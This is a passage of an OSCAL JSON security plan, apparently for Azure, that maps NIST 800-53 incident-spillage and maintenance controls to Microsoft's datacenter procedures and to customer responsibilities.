statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ff919f62-377e-4fea-a147-ec3a4e970d03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.g","by-components":[{"uuid":"4e12d100-2125-4a17-9f90-051d52345c76","export":{"provided":[{"uuid":"443824be-714a-42fb-8a75-3654aeaba351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"}],"description":"Azure incident management follows the incident management process in response to information spillage as documented in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"5ddf3d32-e541-4a7b-b0a2-ecf1ce7309f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"}],"description":"The customer is responsible for defining and performing other customer-defined actions in response to information spills of customer-controlled data.","provided-uuid":"443824be-714a-42fb-8a75-3654aeaba351"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c7dcc082-51c4-457e-bfa5-6af0773fbaae","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.2","statements":[{"uuid":"1a1bd4d5-f983-4e9a-9307-00f5acc11b76","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9.2_smt","by-components":[{"uuid":"7aa3e5c7-3e76-48cb-a7a9-65cf3c1640e5","export":{"provided":[{"uuid":"b486a4b3-05f3-46f3-ba71-633d1833d95c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"}],"description":"All personnel receive annual security training via Security and Privacy Foundations and STRIKE, which include information on incident management. Information spillage is treated as an incident within the incident management process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ac685af2-53e4-40cc-b7d2-93fe15750539","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"}],"description":"The customer is responsible for providing information spillage response training.","provided-uuid":"b486a4b3-05f3-46f3-ba71-633d1833d95c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bda14262-4dec-4588-9da2-592e173c6376","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.3","statements":[{"uuid":"eef41fd4-fde8-46c8-9313-63df9cd677a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ir-9.3_smt","by-components":[{"uuid":"bf4e2123-5cdb-48e1-8554-352ce7cf4d1f","export":{"provided":[{"uuid":"9faa78ef-6bac-4e54-9191-1497239d512a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"}],"description":"The incident management information spill cleanup process does not require shutting down systems or removing systems from the network. Azure personnel are able to continue carrying out assigned tasks while contaminated systems are undergoing corrective actions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ceef553e-051d-4a2b-8060-aedf4a1107d3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-042"}],"description":"The customer is responsible for ensuring customer personnel impacted by information spills can continue carrying out assigned tasks.","provided-uuid":"9faa78ef-6bac-4e54-9191-1497239d512a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"468e487f-5a39-451a-98f7-a8ff10f474e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.4","statements":[{"uuid":"feb1f9d8-19b6-4b55-922a-103e8e068807","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9.4_smt","by-components":[{"uuid":"a023aa25-e0a1-49ed-8270-5e7644ddf1fc","export":{"provided":[{"uuid":"4f2300aa-8426-43f3-8256-ac927f9a8b94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-043"}],"description":"All Azure personnel have received security awareness training requiring the reporting of an incident if they are exposed to information not within their assigned access authorization and have signed Employee Agreements (EAs) that serve as Non-Disclosure Agreements (NDAs)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f1bafbe9-fc99-4364-a459-fee0e1495a63","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-043"}],"description":"The customer is responsible for managing exposure of spilled information to unauthorized personnel.","provided-uuid":"4f2300aa-8426-43f3-8256-ac927f9a8b94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"470f3062-82b9-47e3-872d-8e22ec0c4c13","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-2","statements":[{"uuid":"2407e2f0-6927-4d85-bfd2-f1a471c0759d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.a","by-components":[{"uuid":"0afed553-dd76-4914-a2f6-fdc9c4ab2a00","export":{"provided":[{"uuid":"60beb549-4a0f-4196-8a0f-e6de39a11c64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"}],"description":"Microsoft has two types of assets that must be maintained: Critical Environment (CE) and Site Services: * Critical Environments is the team that provides operation and maintenance of electrical, mechanical, and physical systems that comprise the operating infrastructure of the facility. Examples include generators, UPS, Fire Detection and Suppression systems, and HVAC systems. * Site Services is the team that provides the servicing of Microsoft online services assets (i.e., physical servers, network devices, etc.) located at the datacenter. The Site Services team provides break/fix and deployment services based on the issuance of a work ticket. Microsoft captures maintenance records in the maintenance tracking tool for CE equipment and the workflow ticket tracking system for Site Services. The tool records the date and time of the maintenance, the name of the individual performing the maintenance along with details on the maintenance being performed, and any equipment being removed or replaced. If a particular maintenance activity required that someone be under escort in a restricted area, the name of the escort would be captured in the ticket. Critical Environment Equipment The Critical Environment (CE) team schedules, performs, documents, and reviews all maintenance activities performed on CE assets. Azure datacenters rely on a computerized maintenance management system to manage maintenance schedules and work order management. Microsoft Global Maintenance Standards which are a combination of OEM guidelines, NFPA708, IEEE, historical site data and expertise. Work orders are generated based on original equipment manufacturer (OEM) guidelines and assigned for completion. All maintenance work performed at an Azure datacenter must follow approved instructions captured in a Method of Procedure (MOP) document. A MOP must have datacenter management approval before work can begin. Completed MOPs are reviewed and receive datacenter management sign-off to indicate completion. Details of completed MOPs are stored in the appropriate workflow ticketing tool and then the work order is closed. The workflow ticketing tool is used to document and track all maintenance on CE equipment. CE maintenance activities also require peer reviews of the MOPs as a verification of completeness and quality assurance. The peer reviews verify that any required configurations or security settings are correctly in place before completion of the maintenance. During monthly review meetings with the CE team, Datacenter Management reviews and verifies all CE work that was completed in the previous month. Site Services The Site Services team provides a smart hands and break fix service for assets belonging to properties provisioning services from the datacenter. For example, assets requiring physical maintenance could request smart hands service from the Site Services team. All Site Services work on assets is scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool. No work can occur without an approved work ticket. The Site Services team follows detailed procedure documents that define step by step instructions for specific service requests. As part of the procedure documents, one of the final steps is to perform a Quality Control check to ensure that all steps were completed and that required security settings are in place."}],"responsibilities":[{"uuid":"4fec64ad-eab9-47ed-8a77-2725c4bc0a6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for scheduling, performing, documenting, and reviewing remote maintenance and repair records for all customer-deployed operating systems in accordance with organizational requirements.","provided-uuid":"60beb549-4a0f-4196-8a0f-e6de39a11c64"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"73d3ff94-621c-4e5f-981f-862cae158a28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.b","by-components":[{"uuid":"80b00a5e-35d5-44fb-ba6c-a8994bcd03b2","export":{"provided":[{"uuid":"d4c31178-10b3-472a-b5e5-096fb8b6c9ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"}],"description":"Critical Environment Equipment Datacenter Management consists of Microsoft personnel who serve in the following roles: Datacenter Campus Director, Datacenter Operations Manager (DCOM), IT Operations Manager (ITOM), Critical Environment Operations Manager (CEOM), Senior Electrical Engineer (EE), Senior Mechanical Engineer (ME), Critical Environment Program Manager (CEPM), Instrumentation Engineer (IE), EHS Manager, Energy Marshall, and Datacenter Project Manager (DCPM). The CEOM, CEPM, EE and ME are responsible for work occurring in the DC critical environment. CE maintenance is prescribed in required step by step documents called Methods of Procedure (MOP). MOPs are reviewed and approved by datacenter management prior to any work beginning. MOPs serve as the checklist for the maintenance procedure and the documentation of the work completed. CE maintenance is performed in areas of the datacenter that are controlled and protected by physical security mechanisms, including, but not limited to, approved access, cameras, multifactor authentication, access smart cards, biometrics, and security patrols. Site Services The DCOM, ITOM and/or SOM are responsible for all Site Services work that occurs in the datacenter or for work that requires the asset to be transferred offsite. Site Services maintenance is performed in areas of the datacenter that are controlled and protected by physical security mechanisms (e.g. approved access, cameras, 2FA: access smart cards, biometrics, security patrols)."}],"responsibilities":[{"uuid":"882417f8-34be-4e4b-af5d-deab1f440abc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for approving and monitoring of all remote maintenance activities performed on customer-deployed operating systems.","provided-uuid":"d4c31178-10b3-472a-b5e5-096fb8b6c9ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2b22413c-f683-4c6d-af03-319cb1e5e116","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.c","by-components":[{"uuid":"707c3b7f-999e-499a-b941-8f49bf8f8185","export":{"provided":[{"uuid":"15db5899-fbc1-42c0-836d-5f8596de1c8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-008"}],"description":"Critical Environment Equipment If CE components are required to be removed from the facility, handling of the equipment is approved by Datacenter Management. In most instances, CE components receive onsite maintenance and are not removed from the facility. Site Services Property assets (e.g. Azure network device or server) requiring transfer offsite must have explicit asset owner (e.g. O365 asset owner) approval."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"9e3f2a2b-c101-47b9-8dbe-eb94a33c3d57","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.d","by-components":[{"uuid":"b2d9e5a5-001f-4e08-bf91-8ca90396be67","export":{"provided":[{"uuid":"a444c6d0-e9d9-4f10-a461-53b32e0ffb45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-009"}],"description":"Data Bearing Equipment and Site Services Assets that are to be destroyed are stored in locked storage bins that are under CCTV camera coverage. When the assets are ready to be destroyed, a physical security officer and a Microsoft full time employee (FTE) from Asset Management must escort the locked bin from the Azure colocation to where the onsite shredding is to occur. As shredding occurs at the datacenter and under Microsoft supervision, Azure assets do not leave the controlled areas of the datacenter. Any production device that is to be removed off-site with drives intact require a policy exception ."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"669089e4-b2f8-4816-9a0c-d0036adda90c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.e","by-components":[{"uuid":"73bdc285-1dcd-472f-83a0-38689253e53f","export":{"provided":[{"uuid":"5dc6225d-fda4-438e-8e83-b8a523e6194d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"}],"description":"Critical Environment Equipment CE maintenance activities also require peer reviews of the MOP checklist as a verification of completeness and quality assurance. The peer reviews verify that any required configurations or security settings are correctly in place before completion of the maintenance. During monthly review meetings with the CE team, Datacenter Management reviews/verifies all CE work that was completed in the previous month. Site Services The Site Services team follows detailed procedure documents that define step by step instructions for specific service requests. As part of the procedure documents, one of the final steps is to perform a Quality Control check to ensure that all steps were completed and that required security settings are in place. Any logical access required to Azure assets is performed per the authentication process."}],"responsibilities":[{"uuid":"eb0c6e8a-eb5f-4857-92fd-eb6df13b5939","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying potentially impacted security controls and the process used for verifying those controls are still functioning properly following remote maintenance/repair activities on customer-deployed operating systems.","provided-uuid":"5dc6225d-fda4-438e-8e83-b8a523e6194d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3b640322-6746-4fd6-a76d-212dfd92b233","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2_smt.f","by-components":[{"uuid":"a3f176ee-1ccb-4131-991d-562bc8b1b991","export":{"provided":[{"uuid":"805c7a37-9f43-4f51-9b83-7dc7c3f5d8ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"}],"description":"Azure captures maintenance records in the workflow ticket tracking system for Site Services and the maintenance tracking tool for CE equipment. The tool records the date and time of the maintenance, the name of the individual performing the maintenance along with details on the maintenance being performed, and any equipment being removed or replaced. If a maintenance activity requires that someone be under escort in a restricted area, the name of the escort is captured in the DCAT ticket of the person under escort."}],"responsibilities":[{"uuid":"03cc4923-c930-4da4-83a1-9aa2a2550d42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for including customer-defined remote maintenance-related information for customer-deployed operating systems in organizational maintenance records.","provided-uuid":"805c7a37-9f43-4f51-9b83-7dc7c3f5d8ec"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1208571c-8e7b-49c9-9e9b-1502409c5cf7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-2.2","statements":[{"uuid":"45ddc40b-0db9-40cd-8c23-3cb88a756d0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2.2_smt.a","by-components":[{"uuid":"0fdfec8c-1764-4db5-8546-74c4404cf5d3","export":{"provided":[{"uuid":"b015a8c3-a800-4d9e-a76a-305f016c5e4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"}],"description":"Critical Environment Equipment_x000D_ _x000D_ Azure datacenters rely on a computerized maintenance management system to manage maintenance schedules and work order management._x000D_ _x000D_ Site Services_x000D_ _x000D_ All Site Services work on Azure assets are scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool. No work can occur without an approved work ticket._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4fc57a9c-40b2-4c7e-a4d1-9c7eed9db339","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-012"}],"description":"The customer is responsible for automating remote maintenance activities to schedule, conduct, and document remote maintenance and repairs of customer-deployed operating systems.","provided-uuid":"b015a8c3-a800-4d9e-a76a-305f016c5e4c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eb9a38e1-9c2d-4e1f-88d9-5de4da16edae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-2.2_smt.b","by-components":[{"uuid":"829aa9c3-9f0c-4f72-b2d6-df28f18bc09e","export":{"provided":[{"uuid":"55628b0c-3b6d-46f2-a09a-b4b17d472acc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"}],"description":"Critical Environment Equipment_x000D_ _x000D_ The maintenance ticketing tracking tool is used to document and track all maintenance on CE equipment._x000D_ _x000D_ Site Services_x000D_ _x000D_ All Site Services work on Azure assets are scheduled, performed, documented, and reviewed in work tickets within the workflow ticketing tool._x000D_ _x000D_"}],"responsibilities":[{"uuid":"700d4b69-fd95-4dac-aadb-c6ecff31b1e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-013"}],"description":"The customer is responsible for automating remote maintenance activities, including the production of up-to date, accurate, and complete records of all remote maintenance and repair actions requested, scheduled, in process, and completed for customer-deployed operating systems.","provided-uuid":"55628b0c-3b6d-46f2-a09a-b4b17d472acc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e2692590-d9fa-47b6-9d4b-5d07aa2e81dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3","statements":[{"uuid":"6f8b0026-d50f-4f05-9b12-417230d37336","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3_smt.a","by-components":[{"uuid":"fec83cd9-1e22-4036-b767-8272e24e6180","export":{"provided":[{"uuid":"d6de930c-5e61-4f51-9db0-946a4b50d26c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"}],"description":"All maintenance work must be approved prior to work beginning. Azure implements maintenance tools control by creating an access level within the Datacenter Access Tool (DCAT). Each facility contains a restricted physical lock box or access-controlled room for the storage of specialized maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, etc. Access is controlled to the lock box or storage room using the DCAT tool to prohibit unauthorized access to the maintenance tools. This ensures that only personnel with approved access can access the tools. Third-party maintenance personnel may provide their own calibrated tools or assets where necessary. The same access controls in DCAT that limit access to the on-site tooling are also in place for all work areas where Critical Environment (CE) assets are present. Azure limits where any personnel can go and what doors they can open. To access the work site, they must follow CE procedural requirements. The Site Services team performs routine inventory checks to verify the status of all tools. Access to lock box or maintenance storage room is tracked in the access smart card reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list. In addition, for logical access, maintenance is performed through the utilization of the SI, CM, AC, AU, and IR control families mentioned in this System Security Plan (SSP) document. Logical maintenance is performed through configuration management, access management, monitoring, and incident response tooling and processes. The tooling that are leveraged are ASM, SCUBA, Microsoft Entra ID (formerly AAD), JIT, build services, and incident response ticketing services."}],"responsibilities":[{"uuid":"58de2873-0c58-4272-8ddb-d34e718bb5bf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for approving, controlling and monitoring system maintenance tools used on customer-deployed operating systems.","provided-uuid":"d6de930c-5e61-4f51-9db0-946a4b50d26c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a45e1e25-db93-49fb-bff0-68525c5db13e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3_smt.b","by-components":[{"uuid":"47f53718-b853-41ba-ab82-26237a6139d6","export":{"provided":[{"uuid":"db0bb624-7634-47a8-a336-864974621dbd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"}],"description":"The Site Services team performs routine inventory checks to verify the status of all tools. Access to lock box or maintenance storage room is tracked in the access smart card reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list. In addition, for logical access, maintenance is performed through the utilization of the SI, CM, AC, AU, and IR control families mentioned in this System Security Plan (SSP) document. Logical maintenance is performed through configuration management, access management, monitoring, and incident response tooling and processes. The tooling that are leveraged are ASM, SCUBA, Microsoft Entra ID (formerly AAD), JIT, build services, and incident response ticketing services."}],"responsibilities":[{"uuid":"8218f14e-3c9c-4021-9ba9-f650cfc18286","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing previously approved system maintenance tools at customer-defined frequency for customer-deployed resources.","provided-uuid":"db0bb624-7634-47a8-a336-864974621dbd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1fe4a738-1a71-4d43-b1fd-cfa70e3532f5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.1","statements":[{"uuid":"c89fa816-6b42-4fde-b307-13c1b6d8ac70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.1_smt","by-components":[{"uuid":"2dcfd10e-f43d-449a-b8be-bb5d9b33f839","export":{"provided":[{"uuid":"b003ff0e-bc7a-442b-b011-7fb70cef61ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-016"}],"description":"The Site Services team maintains an inventory of approved maintenance tools for use within the datacenter. Maintenance personnel are directed to use the provided maintenance tools. Datacenter Management (DCM) approval is required to use tools not provided by the datacenter. Physical hand tools such as screwdrivers, wrenches, etc., are exempt from this control. _x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"2a9e13c6-fba6-4164-8bd2-5e09cc86837b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-3.2","statements":[{"uuid":"b39a7d15-5456-46f4-b19f-f4bd3ea31430","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-3.2_smt","by-components":[{"uuid":"2f89e3b3-0414-44ad-9894-c61ee2fdf1e3","export":{"provided":[{"uuid":"acb6d8d8-f2ca-4903-a3c1-dbc405bf7cbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"}],"description":"Use of mobile computing or storage media is prohibited in the production environment of Azure datacenters without datacenter management approval. Use of personally owned media is prohibited from being used in the production environment of Azure datacenters._x000D_ _x000D_ Azure implements a process to inspect laptops and other mobile devices prior to being used in the production environment of Azure datacenters. The process requires that personnel from Site Services inspect laptops to validate that a full anti-virus scan has been performed within twenty-four (24) hours of the datacenter visit, that the virus definition files are current, and that real-time scanning is configured. Laptops that have been validated are marked with an inspection sticker. Security officers are trained to challenge personnel using laptops in the production environment to verify that the laptops have undergone and passed inspection. _x000D_ _x000D_"}],"responsibilities":[{"uuid":"520882ed-f76c-42ce-9894-faedc1dbf91a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-017"}],"description":"The customer is responsible for checking media containing maintenance diagnostic and test programs for malicious code prior to deployment on customer-deployed operating systems.","provided-uuid":"acb6d8d8-f2ca-4903-a3c1-dbc405bf7cbb"}]},"description":"See inheritance and customer responsibility 